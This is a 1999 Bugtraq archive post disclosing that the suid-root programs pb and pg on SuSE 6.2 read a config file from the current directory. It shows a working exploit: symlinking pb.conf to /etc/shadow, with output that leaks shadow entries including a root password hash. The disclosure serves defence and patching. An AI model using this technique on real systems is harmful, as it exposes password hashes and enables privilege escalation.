OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Bugtraq Archives: Two SuSE 6.2 local root exploits

Two SuSE 6.2 local root exploits

Brock Tellier (btellierWEBLEY.COM)
Thu, 16 Sep 1999 19:06:24 -0500

Greetings,

    /usr/bin/pb and /usr/bin/pg, suid root by default on SuSE 6.2, allow
any user to read any file on the system as shown:

susebox:/root # ls -la /usr/bin/pb
uname -rwsr-xr-x 1 root root 23544 Jul 22 20:07 /usr/bin/pb

susebox:/root # strace /usr/bin/pb
...
personality(PER_LINUX) = 0
getpid() = 16623
brk(0) = 0x805032c
brk(0x80504cc) = 0x80504cc
brk(0x8051000) = 0x8051000
open("pb.conf", O_RDONLY) <-- trouble? = -1 ENOENT (No such file or
directory)
write(2, "pb.conf fopen: No such file or d"..., 41pb.conf fopen: No such
file or directory
) = 41
_exit(1) = ?
susebox:/root # 

---
xnecsusebox:/tmp > id
uid=1001(xnec) gid=100(users) groups=100(users)
xnecsusebox:/tmp > ln -s /etc/shadow ./pb.conf
xnecsusebox:/tmp > pb
Unknown config line :  <root:nfpzNvX19GwRg:10850:0:10000::::> =
<bin:*:8902:0:10000::::>
Unknown config line :  <daemon:*:8902:0:10000::::> =
<lp:*:9473:0:10000::::>
Unknown config line :  <news:*:8902:0:10000::::> = <uucp:*:0:0:10000::::>
Unknown config line :  <games:*:0:0:10000::::> = <man:*:8902:0:10000::::>
... etc for the entire shadow file

The same scenario for /usr/bin/pg's pg.conf in your cwd.  These two
programs also contain numerous buffer overflows and other insecure file
i/o and should obviously lose their suid bits.  They cannot operate
correctly without their s-bits unless they are run by root, but no one
besides root will run them anyway.  These programs are not worth
patching.

Brock Tellier
UNIX Systems Administrator
Webley Systems
www.webley.com

This archive was generated by hypermail 2.0b3 on Fri Sep 17 1999 - 01:52:32 CDT